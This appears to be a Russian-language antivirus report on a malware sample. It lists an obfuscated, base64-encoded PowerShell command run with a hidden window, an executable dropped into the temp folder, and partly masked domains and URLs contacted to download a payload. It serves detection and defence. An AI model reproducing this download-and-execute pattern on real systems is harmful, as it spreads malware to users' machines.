Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAcwBgAEMAUgBgAEkAUABUAH0AIAA9ACAAJgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwAnACwAJwBjAHQAJwAsACcAYgBqAGUAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADIAfQB7ADEAfQB7AD...
- %TEMP%\26984.exe
- 'na###h.com.br':80
- 'er#.lt':80
- 'ne##.com.au':80
- 'la####afilms.com':80
- http://na###h.com.br/wVZtWN/
- http://er#.lt/wUGfcJn/
- http://ne##.com.au/WZwgR/
- http://la####afilms.com/BVgUGBfots/
- DNS ASK na###h.com.br
- DNS ASK er#.lt
- DNS ASK om####ecordings.com
- DNS ASK ne##.com.au
- DNS ASK la####afilms.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAcwBgAEMAUgBgAEkAUABUAH0AIAA9ACAAJgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwAnACwAJwBjAHQAJwAsACcAYgBqAGUAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADIAfQB7ADEAfQB7AD...' (со скрытым окном)